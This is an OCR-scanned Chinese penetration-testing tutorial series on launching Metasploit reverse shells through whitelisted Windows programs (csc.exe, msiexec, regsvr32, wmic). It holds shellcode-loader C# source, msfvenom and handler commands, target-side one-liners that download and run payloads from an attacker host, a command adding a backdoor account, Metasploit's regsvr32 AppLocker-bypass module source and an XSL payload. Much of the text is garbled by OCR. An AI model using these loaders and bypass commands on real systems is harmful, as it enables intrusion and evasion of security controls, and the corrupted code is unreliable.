0x80, 0x88, 0x00, 0x00, 0X00, 0x48, 0x85, OxcO, 0x74, 0x67, 0x48, 0x01, OxdO, 0x50, Ox8b, 
0x48, 0x18, 0x44, Ox8b, 0x40, 0x20, 0x49, 0x01, OxdO, Oxe3, 0x56, 0x48, Oxf f, Oxc9, 0x41, 
Ox8b, 0x34, 0x88, 0x48, 0x01, Oxd6, Ox4d, 0x31, Oxc9, 0x48, 0x31, OxcO, Oxac, 0x41, Oxc1, 
Oxc9, 0x0d, 0x41, 0x01, Oxc1, 0x38, OxeO, 0x75, Oxf1, Ox4c, 0x03, Ox4c, 0x24, 0x08, 0x45, 
0x39, Oxd1, 0x75, Oxd8, 0x58, 0x44, Ox8b, 0x40, 0x24, 0x49, 0x01, OxdO, 0x66, 0x41, Ox8b, 
0x0c, 0x48, 0x44, Ox8b, 0x40, Ox1c, 0x49, 0x01, OxdO, 0x41, Ox8b, 0x04, 0x88, 0x48, 0х01, 
0xd0, 0x41, 0x58, 0x41, 0x58, Ox5e, 0x59, 0x5a, 0x41, 0x58, 0x41, 0x59, 0x41, Ox5a, 0x48, 
0x83, Oxec, 0x20, 0x41, 0x52, Oxf f, OxeO, 0x58, 0x41, 0x59, Ox5a, 0x48, Ox8b, 0x12, Oxe9, 
Ox4b, Oxf f, Oxff , Oxff, Ox5d, 0x49, Oxbe, 0x77, 0x73, 0x32, Ox5F, 0x33, 0x32, 0x00, 0x00, 
0x41, 0x56, 0x49, 0x89, Oxe6, 0x48, 0x81, Oxec, 0xa0, 0x01, 0x00, 0x00, 0x49, 0x89, Oxe5, 
0x49, Oxbc, 0x02, 0x00, 0x00, 0x35, OxcO, Оха8, 0x01, 0x04, 0x41, 0x54, 0x49, 0x89, Oxe4, 
0x4c, 0x89, Oxf1, 0x41, Oxba, Ox4c, 0x77, 0x26, 0x07, Oxff , Oxd5, Ox4c, 0x89, Oxea, 0x68, 
0x01, 0x01, 0x00, 0x00, 0x59, 0x41, Oxba, 0x29, 0x80, Ox6b, 0x00, Oxf fF, Oxd5, Ox6a, OxOa, 
0x41, 0x5e, 0x50, 0x50, Ox4d, 0x31, Oxc9, Ox4d, 0x31, OxcO, 0x48, Oxf fF, OxcO, 0x48, 0x89, 
0xc2, 0x48, Oxf f , OxcO, 0x48, 0x89, Oxc1, 0x41, Oxba, Oxea, OxOf , Oxdf, OxeO, Oxff , Oxd5, 
0x48, 0x89, 0xc7, Ox6a, 0x10, 0x41, 0x58, Ox4c, 0x89, Oxe2, 0x48, 0x89, Oxf9, 0x41, Oxba, 
0x99, 0xa5, 0x74, 0x61, Oxff , Oxd5, 0x85, OxcO, 0x74, OxOa, 0x49, Oxff , Oxce, 0x75, Oxe5, 
Oxe8, 0x93, 0x00, 0x00, 0x00, 0x48, 0x83, Oxec, 0x10, 0x48, 0x89, Oxe2, Ox4d, 0x31, Oxc9, 
0x6a, 0x04, 0x41, 0x58, 0x48, 0x89, Oxf9, 0x41, Oxba, 0x02, Oxd9, Oxc8, Ox5f, Oxff , Oxd5, 
0x83, Oxf8, 0x00, Ox7e, 0x55, 0x48, 0x83, Oxc4, 0x20, Ox5e, 0x89, Oxf6, Ox6a, 0x40, 0x41, 
0x59, 0x68, 0x00, 0x10, 0x00, 0x00, 0x41, 0x58, 0x48, 0x89, Oxf2, 0x48, 0x31, Oxc9, 0x41, 
Oxba, 0x58, 0xa4, 0x53, 0xe5, Oxff, Oxd5, 0x48, 0x89, Oxc3, 0x49, 0x89, Oxc7, Ox4d, Ox31, 
©xc9, 0x49, 0x89, Oxf0, 0x48, 0x89, Oxda, 0x48, 0x89, Oxf9, 0x41, Oxba, 0x02, Oxd9, Oxc8, 
Ox5f, Oxff, Oxd5, 0x83, Oxf8, 0x00, Ox7d, 0x28, 0x58, 0x41, 0x57, 0x59, 0x68, 0x00, 0x40, 
0x00, 0x00, 0x41, 0x58, Ox6a, 0x00, Ox5a, 0x41, Oxba, OxOb, Ox2f , OxOf , 0x30, Oxff , Oxd5, 
0x57, 0x59, 0x41, Oxba, 0x75, Ox6e, Ox4d, 0x61, Oxff , Oxd5, 0x49, Oxff , Oxce, Oxe9, Ox3Cc, 
Oxff, Oxff, Oxff, 0x48, 0x01, Oxc3, 0x48, 0x29, 0xc6, 0x48, 0x85, Oxf6, 0x75, Oxb4, 0x41, 
Oxff, Oxe7, 0x58, Ox6a, 0x00, 0x59, 0x49, Oxc7, Oxc2, OxfO, Oxb5, Oxa2, 0x56, Oxff , Oxd5] ; 
IntPtr AmnGaO = VirtualAlloc(0, (UInt32)QWKpWKhcs.Length, 0х3000, 0x04); 
Marshal.Copy(QWKpwKhcs, 0, (IntPtr)(AmnGaO), QWKpWKhcs.Length); 
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IntPtr oXmoNUYvivZlXj - IntPtr.Zero; UInt32 XVXTOi - 0; IntPtr pAeCTfwBS 
о uint BnhanUiUJaetgy; vil : е Based 

bool iSdNUQK = VirtualProtect(AmnGaO, (uint)0x19000, (uint)9x20, out Bnhe 
oXmoNUYvivZlXj = CreateThread(0, ©, AmnGaO, pAeCTfwBS, ©, ref XVXTOi); 
WaitForSingleObject(oXmoNUYvivZlXj, OxFFFFFFFF);) 
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基于 白 名 单 Csc.exe 执 行 payload 第 七 季 


Csc.exe 简 介 : 


C# 的 在 Windows 平 台 下 的 编译 器 名 称 是 Csc.exe， 如 果 你 的 .NET FrameWork SDK 安 装 在 C 盘 ， 那 
么 你 可 以 在 C:\WINNT\Microsoft.NET\Framework\xxxxx 目 录 中 发 现 它 。 为 了 使 用 方便 ， 你 可 以 手动 
把 这 个 目录 添加 到 Path 环 境 变量 中 去 。 用 Csc.exe 编 译 HelloWorld.cs 非 常 简单 ， 打 开 命 令 提示 符 ， 

并 切换 到 存放 test.cs 文 件 的 目录 中 ， 输 入 下 列 行 命令 :csc /targetexe test.cs 将 Ttest.cs 编 译 成 名 为 
test.exe 的 console 应 用 程序 


说 明 : Csc.exe 所 在 路 径 没有 被 系统 添加 PATH 环 境 变 量 中 ， 因 此 ，csc 命 令 无 法 识别 。 
基于 白 名 单 Csc.exe 配 置 payload : 
Windows 7 默认 位 置 : 


C:\Windows\Microsoft.NET\Framework64\v2.0,50727\csc.exe 
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 


攻击 机 : 192.168.1.4 & Debian 
靶 机 : 192.168.1.5 & Windows 7 


配置 攻击 机 msf: 


Module options (exploit/mylti/handler}: 


Mame Current Setting Required Description 


Payload options (vindows/x64/meterpreter/reverse tcp): 
Name Current Settinq 
EXITFUNC proc Exit technique (Accepted: '', seh, thread, process, none) 
LHOST 192. 5D. 4 The listen address (an interface may be specified) 
LPORT 53 yes The listen port 
Exploit target: 


Id Name 


0 Wildcard Target 


mst exploit(multi:;handler) > exploit 


[*] Started reverse TCP handler оп 192,168.1.4:53 





配置 payload : 


msfvenom -p windows/x64/shell/reverse tcp LHOST-192.168.1.4 LPORT=53 -f csharp 


pecified, outputting raw p 


2615 bytes 


Qo 
[m] 


O 
[o O 


о о о Ф 
ә с» © 


> 


с 


2 


со о с 


3 


[n с Kx 
2) 十 o 
о о с 


< 


20! + < 
Же о 


Ж = = < 
с 


22 с С 
> G> сз = С 


x 
с 


[e] 








, 7 , , , 7 , , ғ , 

‚ , , 4 

7 , , , 
: : , , , , , , ‚ 7 , 
: : , 7 , n Й ; ; , , , , , 
, , , , , n ; ; , 7 , , , 
, , P , 7 , 
, , 7 , , 7 7 7 ; : 
, , 7 , ; , t : , , 
А 7 7 , , , , ‚ 
+ 7 7 ‚ ; , , , : 
, ‚ , , , / ‚ ‚ / 
, , ‚ ‚ ; 7 
, , 7 ; 
: 7 7 7 7 Й 
7 7 ; , ; , , 
ғ , 7 ‚ ; , 


靶 机 执行 : 
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C:\Windows\Microsoft .NET\Framework64\v4,0,30319\csc.exe /r:System.EnterpriseSer, 


C:\Windows\Microsoft .NET\Framework64\v4.0.30319\InstallUtil.exe /logfile- /LogTC 


Started rev 
Sending stage | a 
Meterpreter s .168.1.4:53 -> 192.168.1.5:30431) at 2019-01-17 04:19:35 


meterpreter » getuid 
er username: John-PC\John 
meterpreter » getpid 
Current pid: 8504 
meterpreter > [] 





与 第 七 十 二 课 相 比 ，payload 更 为 灵活 。 


附录 : Micropoor Csc.cs 
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sing System; 
sing System. 
sing System. 
sing System. 
using System. 
using System. 


// msfvenom - 


public cl 


1 
publi 


( 


[System.C 
public cl 
í 


publi 
{ 


Shell 


public cl 
{ 
p 
5 


0x51, 0x56, 0x4 
Ox8b, 0x52, 0x2 
0x48, 0x31, Oxc 
0x01, 0xc1, Охе 
0x01, 0xd0, 0x6 
0x80, 0x88, 0х0 
9x48, 0x18, 0x4 


©xc9, 0x0d, 0x4 


ж Р ” уш 
Net; 
Diagnostics; 
Reflection; 
Configuration.Install; 


Runtime. InteropServices; 


p windows/x64/shell/reverse tcp LHOST=192.168.1.4 LPORT-53 -f cshe 
ass Program 


с static void Main() 


omponentModel.Runinstaller(true)] 
ass Sample : System.Configuration.Install.Installer 


c override void Uninstall(System.Collections.IDictionary savedState 


code.Exec(); 


ass Shellcode 


ublic static void Exec() 


byte[] shellcode - new byte[510] ( 
Oxfc, 0x48, 0x83, Oxe4, Oxf0, Oxe8, Oxcc, Ox00, 0x00, 0х00, 0x41, 0x51, 0x41 
8, 0x31, Oxd2, 0x65, 0x48, Ox8b, 0x52, 0x60, 0x48, Ox8b, 0x52, 0x18, Ox48, 
0, 0x48, Ox8b, 0x72, 0x50, 0x48, OxOf , Oxb7, Ох4а, Ox4a, Ox4d, 0X31, Oxc9, 
0, 0xac, Ox3c, 0x61, Ox7c, 0x02, Ox2c, 0x20, 0x41, Oxc1, Oxc9, OxOd, 0x41, 
2,0xed, 0x52, 0x41, 0x51, 0x48, Ox8b, 0x52, 0x20, Ox8b, 0x42, Ox3c, 0x48, 
6, 0x81, 0x78, 0x18, OxOb, 0x02, OxOF, 0x85, 0x72, 0x00, 0x00, 0x00, Ox8b, 
0, 0x00, 0x00, 0x48, 0x85, OxcO, 0x74, 0x67, 0x48, 0x01, OxdO, 0x50, Ox8b, 
4, 0x8b, 0x40, 0x20, 0x49, 0x01, OxdO, Oxe3, 0x56, 0x48, Oxff , OXc9, 0x41, 


Ox8b, 0x34, 0x88, 0x48, 0x01, Oxd6, Ox4d, 0x31, Oxc9, 0x48, 0x31, OxcO, Oxac, 0x41, Oxc1, 


1,0x01, Oxc1, 0x38, 0xe0, 0x75, Oxf1, Ox4c, 0x03, Ox4C, 0x24, 0x08, 0x45, 
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0x39, 0xd1, 0x75, Oxd8, 0x58, 0x44, Ox8b, 0x40, 0x24, 0x49, 0x01, OxdO, 0x66, 0x41, Ox8b, 
0x0c, 0x48, 0x44, Ox8b, 0x40, Ox1c, 0x49, 0x01, OxdO, 0x41, OXBb, 0X04, 0x88, 0x48, 0x01, 
0xd0, 0x41, 0x58, 0x41, 0x58, Ox5e, 0x59, Ox5a, 0x41, 0x58, 0x41, 0x59, 0x41, Ox5a, 0x48, 
0x83, 0xec, 0x20, 0x41, 0x52, Oxff , OxeO, 0x58, 0x41, 0x59, Ox5a, Өх48,09х80,0х12,0хе9, 
Ox4b, Oxff, Oxff, Oxff , Ox5d, 0x49, Oxbe, 0x77, 0x73, 0x32, Ox5f , 0x33, 0x32, 0x00, 0x00, 
0x41, 0X56, 0x49, 0x89, 0хеб, 0x48, 0x81, Oxec, хаб, 0x01, 0x00, 0x00, 0x49, 0x89, Oxe5, 
0x49, Oxbc, 0x02, 0x00, 0x00, 0x35, OxcO, Oxa8, 0x01, 0x04, 0x41, 0x54, 0x49, 0x89, Oxe4, 
0x4c, 0x89, Oxf1, 0x41, Oxba, Ox4c, 0x77, 0x26, 0x07 , Oxff, Oxd5, Ox4c, 0x89, Oxea, 0x68, 
0x01, 0x01, 0x00, 0x00, 0x59, 0x41, Oxba, 0x29, 0x80, Ox6b, 0x00, Oxff , Oxd5, Ox6a, OxOa, 
0x41, 0x5e, 0x50, 0x50, Ox4d, 0x31, Oxc9, Ox4d, 0x31, OxcO, 0x48, Oxf fF, OxcO, 0x48, 0x89, 
0xc2, 0x48, Oxff , OxcO, 0x48, 0x89, Oxc1, 0x41, Oxba, Oxea, OxOf , Oxdf, OxeO, Oxff, Oxd5, 
0x48, 0x89, 0xc7, 0x6a, 0x10, 0x41, 0x58, Ox4c, 0x89, Oxe2, 0x48, 0x89, Oxf9, 0x41, Oxba, 
0x99, 0xa5, 0x74, 0x61, Oxff , Oxd5, 0x85, OxcO, 0x74, OxOa, 0x49, Oxff , Oxce, 0x75,0xe5, 
0xe8, 0x93, 0x00, 0x00, 0x00, 0x48, 0x83, Oxec, 0x10, 0x48, 0x89, Oxe2, Ox4d, 0x31, Oxc9, 
0x6a, 0x04, 0x41, 0x58, 0x48, 0x89, Oxf9, 0x41, Oxba, 0x02, Oxd9, Oxc8, Ox5f, Oxff, Oxd5, 
0x83, 9xf8, 0x00, 0x7e, 0x55, 0x48, 0x83, Oxc4, 0x20, Ox5e, 0x89, Oxf6, Ox6a, 0x40, 0x41, 
0x59, 0x68, 0x00, 0x10, 0x00, 0x00, 0x41, 0x58, 0x48, 0x89, Oxf2, 0x48, 0x31, Oxc9, 0x41, 
0xba, 0x58, 0xa4, 0x53, Oxe5, Oxff, Oxd5, 0x48, 0x89, Oxc3, 0x49, 0x89, Oxc7, Ox4d, Ox31, 
0xc9, 0x49, 0x89, Oxf0, 0x48, 0x89, Oxda, 0x48, 0x89, Oxf9, 0x41, Oxba, 0x02, Oxd9, Oxc8, 
OxSf, 9xff, Oxd5, 0x83, Oxf8, 0x00, Ox7d, 0x28, 0x58, 0x41, 0x57, 0x59, 0x68, 0x00, Ox40, 
0x00, 0x00, 0x41, 0x58, Ox6a, 0x00, 0x5a, 0x41, Oxba, OxOb, Ox2f , OxOf , 0x30, Oxf f, Oxd5, 
0x57,0x59, 0x41, Oxba, 0x75, Ox6e, Ox4d, 0x61, Oxf f, Oxd5, 0x49, Oxf fF, Oxce, 0хе9, Ox3c, 
Oxff,Oxff,Oxff,0x48,0x01, 0xc3, 0x48, 0x29, Oxc6, 0x48, 0x85, Oxf6, 0x75, Oxb4, 0x41, 
Oxff,0xe7,0x58, 0x6a, 0x00, 0x59, 0x49, Oxc7, Oxc2, OxfO, Oxb5, 0xa2, 0x56, Oxff , Oxd5 D> 


UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode .Length, 

MEM COMMIT, PAGE EXECUTE READWRITE); 
Marshal.Copy(shellcode , 0, (IntPtr)(funcAddr), shellcode .Lengt 
IntPtr hThread - IntPtr.Zero; 

UInt32 threadId - 0; 





IntPtr pinfo - IntPtr.Zero; 


hThread - CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId); 4 
WaitForSingleObject(hThread, OxFFFFFFFF); | 


private static UInt32 MEM COMMIT = 0x1000; 


private static UInt32 PAGE EXECUTE READWRITE = 0x40; 


[DllImport("kernel32")] 
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private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, 
UInt32 size, UInt32 flAllocationType, UInt32 flProtect); 


[DllImport("kernel32")] 
private static extern bool VirtualFree(IntPtr lpAddress, 
UInt32 dwSize, UInt32 dwFreeType); 


[Dllimport("kernel32")] 
private static extern IntPtr CreateThread( 


UInt32 lpThreadAttributes, 
UInt32 dwStackSize, 

UInt32 lpStartAddress, 
IntPtr param, 

UInt32 dwCreationFlags, 
ref UInt32 lpThreadId 


); 
[DllImport("kernel32")] 
private static extern bool CloseHandle(IntPtr handle); 


[DllImport("kernel32")] 
private static extern UInt32 WaitForSingleObject( 


IntPtr hHandle, 

UInt32 dwMilliseconds 
[D1lImport("kernel32")] 
private static extern IntPtr GetModuleHandle( 


string moduleName 


); 
[DllImport("kerne132")] 
private static extern UInt32 GetProcAddress( 


IntPtr hModule, 
string procName 


); 
[DllImport("kernel32")] 
private static extern UInt32 LoadLibrary( 


string lpFileName 


); 
{DllImport("kerne132") ] 
private static extern UInt32 GetLastError(); 
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基于 白 名 单 Msiexec 执 行 payload 第 八 季 


Msiexec 简 介 : 


Msiexec 是 Windows Installer 的 一 部 分 。 用 于 安装 Windows Installer 安 装 包 (MSI) ,一 般 在 运行 
Microsoft Update 安 装 更 新 或 安装 部 分 软件 的 时 候 出 现 ， 占 用 内 存 比 较 大 。 并 且 集 成 于 Windows 
2003，Windows 7 等 。 


说 明 : Msiexec.exe 所 在 路 径 已 被 系统 添加 PATH 环境 变量 中 ， 因 此 ，Msiexec 命 令 可 识别 。 
基于 白 名 单 Msiexec.exe 配 置 payload: 


Windows 2003 默认 位 置 : 


C: NWINDOWSNsystem32Nmsiexec.exe 
C: NWNINDOWSNSysWOW64Nmsiexec.exe 


攻击 机 : 192.168.1.4 & Debian 
ЗЛ: 192.168.1.119 &Windows 2003 


配置 攻击 机 msf: 


Module options (exploit/multi/handler): 
Name Current Setting Required Description 
Payload options {windo 
Name Current Setting Required Description 
Exit technique (Accepted: '', seh, thread, process, none) 
The listen address (an interface may be specified) 
The listen port 
oit target: 


(Ін Name 


0 wildcard Target 


nsf exploit(rultishandler) > exploit 


[*] Started reverse TCP handler on 192.168.1.4:53 





BCE payload: 


mSfvenom -p windows/x64/shell/reverse tcp LHOST-192.168.1.4 LPORT=53 -f msi > Mi 


b 


var Aan htels hom -p windews 
platform w: elected ac M 


| -f msi > Micropoor rev x64 53 ty+ 









iJohn: /var Aww/html& netstat -ntlp |grep 80 
tep 9 1:80 Di 


靶 机 执行 : 


LISTEN 


3895/apathez 


C:NWindowsNSystem32Nmsiexec.exe /q /i http://192.168.1.4/Micropoor rev x64 53. фу 





:常规 ”站 计算 机 名 | ee | 高 级 | 自动 更 新 | 远程 | 


2 


ғ: 


Microsoft Windows Server 2003 R2 


Enterprise x64 Edition 





Service Pack 2 





Sending < 
Meterpreter s ,168,1.4:53 -> 192.168.1.119:1436) at 2 


erpreter 
Current pld 


meterpreter > ipconfig |grep 192, 
Interface 1 


ame z MS Loopback interface 
Hardware MAC ; 00: 00:00:00 
MTU 
IPY4 Addr 


ame edn Ч MT Network Connection 
Hardware MAC ; f 5 

MTU 

IPv4 Address 

ІРу4 Netmask : 


meterpreter > | 
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基于 白 名 单 Regsvr32 执 行 payload 第 九 季 


Regsvr32 简 介 : 


Regsvr32 命 令 用 于 注册 COM 组 件 ， 是 Windows 系统 提供 的 用 来 向 系统 注册 控件 或 者 卸载 控件 的 命 
令 ， 以 命令 行 方式 运行 。WinXP 及 以 上 系统 的 regsvr32.exe 在 windows\system32 文 件 夹 下 ; 2000 系 
统 的 regsvr32.exe 在 winnt\system32 文 件 夹 下 。 但 搭配 regsvr32.exe 使 用 的 DLL， 需 要 提供 
DIIRegisterServer 和 DllUnregisterServer 两 个 输出 函 式 ， 或 者 提供 Dlllnstall 输 出 函数 。 


说 明 : Regsvr32.exe 所 在 路 径 已 被 系统 添加 PATH 环境 变量 中 ， 因 此 ，Regsvr32 命 令 可 识别 。 
Windows 2003 默认 位 置 : 


C:NWINDOWSNSysWOW64Nregsvr32.exe 
C; \WINDOWS\system32\regsvr32.exe 


WHHL: 192.168.1.4 &Debian 
ҰШ: 192.168.1.119 &Windows 2003 


msf 已 内 置 auxiliary 版 本 的 regsvr32_command_delivery_server， 但 是 最 新 版 已 经 无 exploit 版 本 
regsvr32， 文 章 结 尾 补充 。 


配置 攻击 机 msf: 


msf auxiliary(server/regsvr32 command delivery server) > use auxiliary/server/re 
msf auxiliary(server/regsvr32 command delivery server) > set CMD net user Microp 
СМО => net user Micropoor Micropoor /add 

msf auxiliary(server/regsvr32 command delivery server) » exploit 


[*] Using URL: http://0.0.0.0:8080/ybn7xESQYCGv 
[*] Local IP: http://192.168.1.4:8080/ybn7xESQYCGv 
[*] Server started. 

[*] Run the following command on the target machine: 

regsvr32 /s /n /u /i:http://192.168.1.4:8080/ybn7xESQYCGv scrobj.dll 


ег, › command delivery server 
tvereregsve32 command Ж. $ М 0 Micropoor sadd 

г Mic or Microp 
y 


vr32 command deliver 


IP: http: 
tarted. 
following command on the target machine: 
$ Zn /u /i;http://192.168.1.4; 8080/ybn7xES AMET 





靶 机 执行 : 


regsvr32 /s /n /u /i:http://192.168.1.4:8080/ybn7xESQYCGv scrobj.dll 


Жік: 
Microsoft Windows Server 2003 RZ 
Enterprise x64 Edition 


Service Pack 2 


注册 到 : 


SNWIN03X64 的 用 户 帐户 


IUSR_WINB3X64 


Administrator Guest 
SUPPORT _388945a6 


C:\Documents and Settings Administrator\ = > 


C:\Documents and Settings Mdministrator\# [H] regsur32 zs fn fu Zithttp?//192 168 
~1.4:8686/ybn?xESQYCGu scrobj.dll 


C:\Documents and Settings Administrator A Mnet user 


\MWING3K64 的 用 户 帐户 


© f IUSR. WING3X64 
Micropoor SUPPORT 388945aB 


fidministrator 


9:8080/ іні 
8.1.4:8080/] 


[*] Serv rted. 


[*] Run the fol 14 command on the target machine; 


а 


[*] Handling request from 192,168,1,11 





И: powershellhkRegsvr32 


regsvr32 applocker bypass server.rb 
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ян 

A " = ~ 
# This module requires Metasploit: http: //metasploit .com/download 
& Current source: https://github.com/rapid7/metasploit-framework 
ян 


class MetasploitModule « Msf::Exploit::Remote 
Rank - ManualRanking 


include Msf::Exploit::Powershell 
include Msf::Exploit::Remote::HttpServer 


def initialize(info - ()) 
super(update info(info, 

' Name ' => 'Regsvr32.exe (.sct) Application whitelisting Bypass Ser 
'Description' => %4( 

This module simplifies the Regsvr32.exe Application Whitelisting Bypass 

The module creates a web server that hosts an .sct file. When the user t 

command on a system, regsvr32 will request the .sct file and then execut 

This command then downloads and executes the specified payload (similar 

Both web requests (i.e., the .sct file and PowerShell download and exect 


), 
'License' ш> MSF LICENSE, 
'Author' ш> 
[ 
'Casey Smith', # AppLocker bypass research and vulnerability discover 
'Trenton Ivey', # MSF Module (kn0) 
1, 
'DefaultOptions' -> 
{ 
'Payload' ш> 'windows/meterpreter/reverse tcp' 
}, 
'Targets' => [SH ЕТ; 
'Platform' => %w(win), 


"Arch' => [ARCH X86, ARCH X86 64], 
'DefaultTarget' -> 0, 
'DisclosureDate' -> "Арг 19 2016", 


'References' ш> 
[ 
['URL', 'http://subtOx10.blogspot.com/2016/04/bypass-application-white 
] 
) ) 
end 
def primer 


print status('Run the following command on the target machine:') 
print line("regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll") 
end 
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м ” » 
def on request uri(cli, request) 
# If the resource request ends with '.sct', serve the .sct file 
# Otherwise, serve the PowerShell payload 
if request.raw uri -- /N.sct$/ 
serve sct file 
else 
serve psh payload 
end 
end 


def serve sct file 
print status("Handling request for the .sct file from #{cli.peerhost}") 
ignore cert - Rex::Powershell::PshMethods.ignore ssl certificate if ssl 
download string - Rex::Powershell::PshMethods.proxy aware download and exec. 
download and run = "#{ignore_cert}#{download_string}" 
psh command - generate psh, command line( 
noprofile: true, 
windowstyle: 'hidden', 
command: download and run 
) 
data - gen sct file(psh command) 
send response(cli, data, 'Content-Type' => 'text/plain') 
end 





def serve psh payload 
print status("Delivering payload to &(cli.peerhost)") 
data - cmd psh payload(payload.encoded, 
payload instance.arch.first, 
remove comspec: true, 
use single quotes: true 
) 
send response(cli,data, 'Content-Type' => 'application/octet-stream') 
end 


def rand class id 
"ER(Rex::Text.rand text hex 8])-&(Rex::Text.rand text hex 4)-4(Rex::Text.rand. 
end 


def gen sct file(command) 
%{<?XML version="1.0"?><scriptlet><registration progid="#{rand_text_alphanun 


end 


end 
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使 用 方法 : 
copy regsvr32 applocker bypass server.rb to /usr/share/metasploit- 
framework/modules/exploits/windows/misc 


msf auxlllary(server:regsvr32 command delivery server) > reload_all 


[+] Reloading modules from all module paths... 
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基于 白 名 单 Wmic 执 行 payload 第 十 季 
Wmic 简 介 : 


WMIC 扩 展 WMI (Windows Management Instrumentation，Windows 管 理工 具 ) ， 提 供 了 从 命令 行 
接口 和 批 命 令 脚本 执行 系统 管理 的 支持 。 在 WMIC 出 现 之 前 ， 如 果 要 管理 WMI 系 统 ， 必 须 使 用 一 些 
专门 的 WMI 应 用 ， 例 如 SMS， 或 者 使 用 WMI 的 脚本 编程 AP1， 或 者 使 用 象 CIM Studio 之 类 的 工具 。 
如 果 不 熟 悉 C++ 之 类 的 编程 语言 或 VBScript 之 类 的 脚本 语言 ， 或 者 不 掌握 WMI 名 称 空间 的 基本 知 
识 ， 要 用 WMI 管 理 系统 是 很 困难 的 。WMIC 改 变 了 这 种 情况 。 


ҘАН: Wmic.exe 所 在 路 径 已 被 系统 添加 PATH 环 境 变量 中 ， 因 此 ，Wmic 命 令 可 识别 ， 需 注意 x86， 
x64 位 的 Wmic 调 用 。 


Windows 2003 默认 位 置 : 


С: \WINDOWS\system32\wbem\wmic.exe 
C: NWINDOWSNSysWOW64NwbemNwmic . exe 


windows 7 默认 位 置 : 


C: NWindowsNSystem32NwbemNWMIC.exe 
С: NindowsNSysWOW64NwbemNWMIC.exe 


攻击 机 : 192.168.1.4 &Debian 
靶 机 : 192.168.1.119 &Windows 2003 
192.168.1.5& Windows 7 


配置 攻击 机 msf: 
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msf exploit(multi/handler) » show options r 


Module options (exploit/multi/handler): 


Name Current Setting Required Description 


payload options (windows/meterpreter/reverse tcp): 


Name Current Setting Required Description 

EXITFUNC process yes Exit technique (Accepted: '', seh, three 
LHOST 192.168.1.4 yes The listen address (an interface may be 
LPORT 53 yes The listen port 


Exploit target: 


Id Мате 


© Wildcard Target 


exploit{rultishandler) > show options 


Module options (exploit/multi/handler): 


Name Current Setting Required Description 


Payload options (windows/meterpreter/reverse tcp): 
Name Current Setting Required Description 
EXITFUNC proce Exit technique (Accepted: '', seh, thread, process, none) 
LHOST 192.168.1.4 The listen address (an interface may be specified) 
LPORT 53 y The listen port 
Exploit target: 
Id Name 


O Wildcard Target 


msf exploit (multi handler) > exploit 


[*] Started reverse TCP handler on 192.168.1.4:53 





靶 机 执行 : 


Windows 7: 
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C: NindowsNSysWOWe4NwbemNWMIC.exe os get /format:"http://192.168.1.4/Micropoor,, 


WOWE4 N wbem N WMT. exe OS 


msf exploit(multi handler) > exploit 
[*] Started reverse TCP handler on 192. 

[*] Sending stage 779 bytes) to 192.1 

[*] Meterpreter session 49 opened (192.168.1.4: Я j,1.5:14224) Bt 2019-01-18 15:24:24 50500 


meterpreter » getuid 

Server username: John-PC\John 
meterpreter » getpid 

Current pid; 15544 





Windows 2003: 


ptam t § нее ee эы 


系统 : 
Microsoft Windows Server 2003 R2 


Enterprise x64 Edition 





Service Раск 2 





注册 到 : 


fidministrator AS PNET Guest 
IUSR_WING3K64 IWAM_WIN@3%64 SUPPORT 388945ай 
Ap ATE Dx. 





WMIC.exe os get /format:"http://192.168.1.4/Micropoor 2003.xsl" 


C:\Documents and бессіпд5 “Ядпіпісекабокопес user 


NNIINO3X64 的 用 户 帐户 


Administrator AS PNET 


IUSR_WIN@3K64 TWAM_WING3%64 | Micropoor 
SUPPORT _388945a@ 





附录 : 


Місгороог Win7.xsl: 
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<?xml version='1.0'?> 

<stylesheet 

xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-con 
xmlns:userz"placeholder" 

version="1.0"> 

<output method="text"/> 

<ms:script implements-prefix="user" language="JScript"> 

<! [CDATA[ 


function setversion() { 

J 

function debug(s) (3 

function base64ToStream(b) 1 
var enc - new ActiveXObject("System.Text.ASCIIEncoding"); 
var length - enc.GetByteCount 2(b); 
var ba - enc.GetBytes 4(b); 
var transform = new ActiveXObject("System.Security.Cryptography.FromBase64Tr 
ba - transform.TransformFinalBlock(ba, 0, length); 
var ms - new ActiveXObject("System.IO.MemoryStream"); 
ms.write(ba, 0, (length / 4) * 3); 
ms.Position - 0; 
return ms; 


var serialized obj = "AAEAAAD/////AQAAAAAAAAAEAQAAAC JTeXNOZWOURGVSZWdhdGVTZXJ p YW 
"AwAAAAhEZWX1Z2F0ZQdOYXJnZXQwB211dGhvZDADAwMwU31zdGVt LkRlbGVnYXR1U2VyaWF saXph'" 
"dGlvbkhvbGRlcitEZWXxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWXlZ2FOZVNlcmlhbGl6YXRpb25Ib2xk"- 
"ZXIvU31zdGVtLlJlzmxlY3Rpb24uTWVtYmVySWw5mbiNlcmlhbGleYXRpb25Ib2xkZXIJAgAAAAKD + 
"AAAACQQAAAAEAGAAADBT eXNOZWOURGVsZVWdhdGVTZXJpYWxpemFOawW9uSG9sZGVyKOR1bGVnYXR1"-* 
"RW5OCcnkHAAAABHRSCGUIYXNZZW1ibHkGdGFyZ2VOEnRhcmdldFRScGVBC3NlbWJseQ50YXJnZXRU" + 
"eXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRIRW50cnkBAQIBAQEDMFN5C3RIbSSEZWXlZ2FO0ZVNIl"'-* 
"cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5CSRIbS5SdW50aW11LlJlbW90"-* 
"aW5nLk11c3NhZ21uZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNj b3JsaWIsIFZlcnNpb249Mi4wLjAu"- 
"MCwgQ3VsdHVyZTiuzXVOcmFsLCBQdWJsaWNLZX1Ub2tlb;jiiNzdhNWMi1NjESMZRIMDg5BgcAAAAH + 
"dGFyZ2VOMAKGAAAABgkAAAAPU31zdGVt LKR1bGVnYXR1BgoAAAANRHluYWi1pYOludm9rZQoEAwAA" + 
"ACJTeXNOZWOURGVsZWdhdGVTZXJpYWxpemFGaW9uSG9sZGVyAvAAAAhEZWX1Z2F0ZQdOYXJnZXQw" * 
"B211dGhvZDADBwMwU31lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWXlZ2F0ZUVu" * 
